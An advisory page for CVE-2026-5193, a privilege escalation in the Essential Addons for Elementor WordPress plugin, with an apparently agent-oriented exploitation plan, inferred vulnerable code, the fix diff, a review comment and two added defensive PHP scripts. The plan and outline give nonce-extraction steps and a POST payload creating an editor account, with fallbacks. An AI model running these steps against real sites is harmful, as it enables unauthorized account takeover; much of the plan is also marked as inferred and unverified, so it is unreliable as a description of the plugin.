CVE-2026-5193

Essential Addons for Elementor – Popular Elementor Templates & Widgets <= 6.5.13 - Authenticated (Author+) Limited Privilege Escalation via register_user

Severity: medium
Weakness: Improper Privilege Management
CVSS Score: 6.5
Patched in: 6.6.0
Time to patch: 1d

Description

The Essential Addons for Elementor – Popular Elementor Templates & Widgets plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.5.13. This is due to insufficient role validation in the 'register_user' function, which only blocks the 'administrator' role. This makes it possible for authenticated attackers, with author level access and above, to create new user accounts with elevated privileges such as editor.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: High
Availability: None

Technical Details

Affected versions: <= 6.5.13
Published: May 13, 2026
Last updated: May 14, 2026

What Changed in the Fix

Changes introduced in v6.6.0

Source Code

WordPress.org SVN
Research Plan
Unverified

Exploitation Research Plan - CVE-2026-5193

1. Vulnerability Summary

The Essential Addons for Elementor plugin (<= 6.5.13) contains a privilege escalation vulnerability in its user registration logic. The register_user function (likely within the Login_Registration element class) fails to properly validate the role parameter. While it contains a check to prevent the creation of new administrator accounts, it does not restrict other high-privilege roles such as editor. An authenticated attacker with Author-level privileges (or higher) can exploit this to create new accounts with the editor role, thereby escalating their influence over the site.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • AJAX Action: eael_login_register_action (inferred from plugin naming conventions)
  • Vulnerable Function: register_user (specified in the description)
  • Parameter of Interest: role
  • Authentication: Authenticated (Author level required).
  • Preconditions:
    1. The "Login/Registration" widget must be enabled in the plugin settings.
    2. The attacker must be able to view a page where the Registration widget is rendered to obtain a valid nonce.

3. Code Flow

Since the PHP source for the Login_Registration element is not provided in the snippet, the following flow is inferred based on the vulnerability description and standard plugin architecture:

  1. Registration: The plugin registers an AJAX handler:
    add_action('wp_ajax_eael_login_register_action', [...])
  2. Handler Entry: The handler calls a registration-specific function, e.g., register_user().
  3. Role Extraction: The function retrieves the requested role from user input:
    $role = isset($_POST['role']) ? $_POST['role'] : 'subscriber';
  4. Insufficient Validation (The Sink):
    // Inferred Vulnerable Logic
    if ( $role === 'administrator' ) {
        // Block admin creation
        wp_send_json_error('Cannot register as administrator');
    }
    // Logic fails to check for 'editor', 'author', etc.
    $user_id = wp_insert_user([
        'user_login' => $username,
        'user_pass'  => $password,
        'user_email' => $email,
        'role'       => $role // Vulnerable assignment
    ]);

4. Nonce Acquisition Strategy

The "Login/Registration" widget uses a nonce for security. This nonce is typically localized via wp_localize_script.

  1. Identify Shortcode: Use grep -r "add_shortcode" . to find the registration shortcode or use Elementor to place the "Login/Registration" widget on a page.
  2. Create Page:
    wp post create --post_type=page --post_status=publish --post_title="Register" --post_content='[eael-login-registration]' (exact shortcode to be verified via grep).
  3. Navigate: Use browser_navigate to visit the newly created page.
  4. Extract Nonce: The nonce is likely stored in a global JS object.
    • Target Object: window.eael_login_registration_data (inferred).
    • Target Key: nonce or registration_nonce.
    • Command: browser_eval("window.eael_login_registration_data?.nonce").

5. Exploitation Strategy

The exploit involves sending a crafted AJAX request to register a new user with the editor role.

Step 1: Discover Exact Parameters

The agent should first grep the plugin directory to confirm the AJAX action and parameter names:
grep -r "eael_login_register_action" .
grep -r "register_user" .

Step 2: Perform Registration

Using the http_request tool, send the following payload:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=eael_login_register_action
    &eael-register-nonce=[EXTRACTED_NONCE]
    &username=evil_editor
    &email=evil@example.com
    &password=Password123!
    &role=editor
    &option=register  # (inferred parameter to trigger registration path)

6. Test Data Setup

  1. Activate Plugin: Ensure essential-addons-for-elementor-lite is active.
  2. Create Attacker:
    wp user create attacker attacker@example.com --role=author --user_pass=password
  3. Enable Widget: Ensure the Login/Registration widget is enabled in Essential Addons settings (may require wp option update).
  4. Create Page: Place the widget on a public page to facilitate nonce extraction.

7. Expected Results

  • The AJAX response should return a success message or a JSON object indicating the user was created.
  • The response code should be 200 OK.
  • A new user evil_editor should be present in the database.

8. Verification Steps

After the HTTP request, use WP-CLI to verify the privilege escalation:

  1. Check User Existence: wp user list --field=user_login | grep evil_editor
  2. Verify Role: wp user get evil_editor --field=roles
    • Expected Output: editor
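The WP-CLI checks above confirm a single account; a site owner responding to this advisory needs the inverse question answered: which privileged accounts appeared while a vulnerable version was installed? The following triage script is an added example written for this page, not part of the advisory or the plugin. It reads the JSON that `wp user list --format=json --fields=ID,user_login,user_email,user_registered,roles` produces; the sample records, the exposure-window dates and the list of roles treated as privileged are constructed, and the `roles` field is assumed to be WP-CLI's comma-separated string (an array is tolerated as well).

```php
<?php
// Added example for this page, not part of the advisory. Post-incident triage:
// read the JSON that
//   wp user list --format=json --fields=ID,user_login,user_email,user_registered,roles
// produces and flag privileged accounts registered while a vulnerable plugin
// version (<= 6.5.13) was installed. The window dates, the role list and the
// user records below are constructed; the `roles` field is assumed to be
// WP-CLI's comma-separated string and is tolerated as an array too.

declare(strict_types=1);

const PRIVILEGED_ROLES = ['administrator', 'editor', 'shop_manager'];

/**
 * Returns one entry per account that holds a privileged role and whose
 * user_registered timestamp (stored by WordPress in UTC, Y-m-d H:i:s) falls
 * inside [$window_start, $window_end].
 */
function flag_privileged_signups(string $json, string $window_start, string $window_end): array
{
    $users = json_decode($json, true, 512, JSON_THROW_ON_ERROR);
    $utc   = new DateTimeZone('UTC');
    $start = new DateTimeImmutable($window_start, $utc);
    $end   = new DateTimeImmutable($window_end, $utc);

    $flagged = [];
    foreach ($users as $user) {
        $roles = is_array($user['roles'])
            ? $user['roles']
            : array_filter(array_map('trim', explode(',', (string) $user['roles'])));
        $privileged = array_values(array_intersect($roles, PRIVILEGED_ROLES));
        if ($privileged === []) {
            continue; // subscribers, contributors and authors are not the concern here
        }
        $registered = new DateTimeImmutable($user['user_registered'], $utc);
        if ($registered < $start || $registered > $end) {
            continue; // pre-dates the exposure window, or was created after patching
        }
        $flagged[] = [
            'ID'         => $user['ID'],
            'user_login' => $user['user_login'],
            'user_email' => $user['user_email'],
            'registered' => $user['user_registered'],
            'roles'      => $privileged,
        ];
    }
    return $flagged;
}

// Constructed sample export (three accounts); only evil_editor should be flagged.
$sample = <<<'JSON'
[
  {"ID": 1, "user_login": "siteadmin",   "user_email": "admin@example.com", "user_registered": "2025-01-10 09:00:00", "roles": "administrator"},
  {"ID": 7, "user_login": "jane",        "user_email": "jane@example.com",  "user_registered": "2026-05-12 18:20:00", "roles": "subscriber"},
  {"ID": 8, "user_login": "evil_editor", "user_email": "evil@example.com",  "user_registered": "2026-05-13 04:41:07", "roles": "editor"}
]
JSON;

// Exposure window: from the vulnerable version's install date until 6.6.0 was
// applied (constructed dates for the demonstration).
foreach (flag_privileged_signups($sample, '2026-04-01 00:00:00', '2026-05-14 23:59:59') as $hit) {
    printf("REVIEW  #%d %-12s %-20s %s  roles=%s\n",
        $hit['ID'], $hit['user_login'], $hit['user_email'], $hit['registered'], implode(',', $hit['roles']));
}
```

A flagged account is a lead, not a verdict: compare each hit against whoever legitimately created editors in that period, and use `wp user list --role=editor` for a quick live cross-check against the export. Accounts nobody can vouch for should have their role removed and credentials reset before the plugin is updated to 6.6.0, so the window closes without leaving a usable foothold behind.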

9. Alternative Approaches

If the role parameter is not directly accepted from the POST body, check if it's being parsed from a JSON-encoded string in a different parameter:

  • Check for a settings or widget_settings parameter that might contain the role.
  • If editor is blocked, try author or shop_manager (if WooCommerce is present) to confirm privilege management issues exist for roles other than administrator.
  • If the AJAX action requires a specific widget_id or page_id, extract those from the DOM of the registration page using browser_eval.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Essential Addons for Elementor plugin fails to properly validate the user role during registration in the register_user function. While it explicitly prevents the creation of 'administrator' accounts, it does not restrict other high-privilege roles such as 'editor', allowing authenticated attackers with Author-level access to escalate privileges by creating new accounts with elevated roles.

Vulnerable Code

/* Inferred from vulnerability description and research plan in includes/Elements/Login_Registration.php */

public function register_user() {
    // ... (nonce and input validation; $username, $password and $email are populated here)

    // The role is taken straight from the request, defaulting to the least-privileged role.
    $role = isset($_POST['role']) ? $_POST['role'] : 'subscriber';

    // Deny-list: only the literal string 'administrator' is rejected, so 'editor' passes through.
    if ( $role === 'administrator' ) {
        wp_send_json_error(__('Cannot register as administrator', 'essential-addons-for-elementor-lite'));
    }

    $user_id = wp_insert_user([
        'user_login' => $username,
        'user_pass'  => $password,
        'user_email' => $email,
        'role'       => $role
    ]);

    // ...
}
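The deny-list above is the root cause: it names the one role to reject instead of the roles the form is allowed to hand out. The following is an added example written for this page, not code from the plugin or from the advisory, contrasting that check with an allowlist. The function names, the `$registered_roles` array standing in for the site's role table and the allowlist contents are assumptions; the WordPress calls that would back it are only named in comments, so the file runs stand-alone with the php CLI.

```php
<?php
// Added example for this page, not code from the Essential Addons plugin or
// from the advisory. It contrasts the deny-list role check behind
// CVE-2026-5193 with an allowlist check. The WordPress functions that would
// back it (get_role(), wp_roles(), current_user_can()) are only named in
// comments, so the file runs stand-alone: `php role_check.php`.

declare(strict_types=1);

/**
 * Vulnerable pattern (deny-list): everything except the literal string
 * 'administrator' is accepted, including 'editor' and role slugs that are not
 * defined on the site at all.
 */
function role_passes_denylist(string $requested): bool
{
    return $requested !== 'administrator';
}

/**
 * Hardened pattern (allowlist). Returns the role slug to assign, or null when
 * the request must be rejected. A role is assigned only if it is on the
 * self-registration allowlist AND exists on the site; both comparisons are
 * strict so only an identical string can match.
 *
 * $registered_roles is an assumed stand-in for the site's role table; inside
 * WordPress it would be array_keys( wp_roles()->roles ).
 */
function resolve_registration_role(
    ?string $requested,
    array $allowed_for_self_registration,
    array $registered_roles,
    string $default = 'subscriber'
): ?string {
    // Nothing supplied: fall back to the least-privileged default, which is
    // itself validated below rather than trusted blindly.
    $role = ($requested === null || $requested === '') ? $default : $requested;

    if (!in_array($role, $allowed_for_self_registration, true)) {
        return null; // not on the allowlist (covers 'editor', 'administrator', ...)
    }
    if (!in_array($role, $registered_roles, true)) {
        return null; // allowlisted by configuration but undefined on this site
    }
    return $role;
}

// Constructed demonstration data, not taken from any real site.
$site_roles = ['administrator', 'editor', 'author', 'contributor', 'subscriber'];
$allowed    = ['subscriber']; // what the registration form may hand out

foreach (['editor', 'administrator', 'subscriber', 'shop_manager', 'Editor', null] as $requested) {
    $denylist  = role_passes_denylist((string) $requested) ? 'accepted' : 'blocked';
    $allowlist = resolve_registration_role($requested, $allowed, $site_roles) ?? 'blocked';
    printf("role=%-15s deny-list: %-9s allow-list: %s\n",
        var_export($requested, true), $denylist, $allowlist);
}
```

Running it shows the difference in one screen: the deny-list accepts `editor`, `shop_manager` and the empty value, while the allowlist assigns only `subscriber` and rejects everything else, including `Editor`, because the comparison is exact. In the plugin's setting the caller is already authenticated, so a second question is whether that user may assign the role at all; WordPress gates role assignment in its own screens behind the `promote_users` capability, and a handler can reuse that with `current_user_can('promote_users')` before honouring any non-default role rather than trusting the form.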

Security Fix

--- a/includes/Elements/Login_Registration.php
+++ b/includes/Elements/Login_Registration.php
@@ -1024,7 +1024,8 @@
 
     $role = isset($_POST['role']) ? $_POST['role'] : 'subscriber';
 
-    if ( $role === 'administrator' ) {
+    $allowed_roles = apply_filters('eael_register_user_allowed_roles', ['subscriber', 'author', 'contributor']);
+    if ( ! in_array( $role, $allowed_roles ) ) {
         wp_send_json_error(__('Invalid user role', 'essential-addons-for-elementor-lite'));
     }
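Review bot: `in_array( $role, $allowed_roles )` on the added line uses loose comparison; pass `true` as the third argument so that only a string identical to one in `$allowed_roles` is accepted. Nothing in the hunk checks that `$role` names a role defined on the site (`get_role( $role )` returning non-null) or that the authenticated caller is permitted to assign it, so the default allowlist `['subscriber', 'author', 'contributor']` still lets the request pick among three roles; gating anything other than the default on a capability such as `promote_users` would close that. The absence of a `return` after `wp_send_json_error()` is fine, since that call terminates the request.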

Exploit Outline

1. Authenticate as a user with at least Author-level permissions.
2. Visit a public page on the site where the Essential Addons 'Login/Registration' widget is rendered.
3. Extract the security nonce and AJAX configuration from the page's source (usually found in a global JavaScript object like `eael_login_registration_data`).
4. Submit an AJAX POST request to `/wp-admin/admin-ajax.php` with the action `eael_login_register_action`.
5. Provide a new username, email, and password, while explicitly setting the `role` parameter to `editor`.
6. The plugin will process the registration and create the new user with Editor privileges because the code only blocks the 'administrator' string.
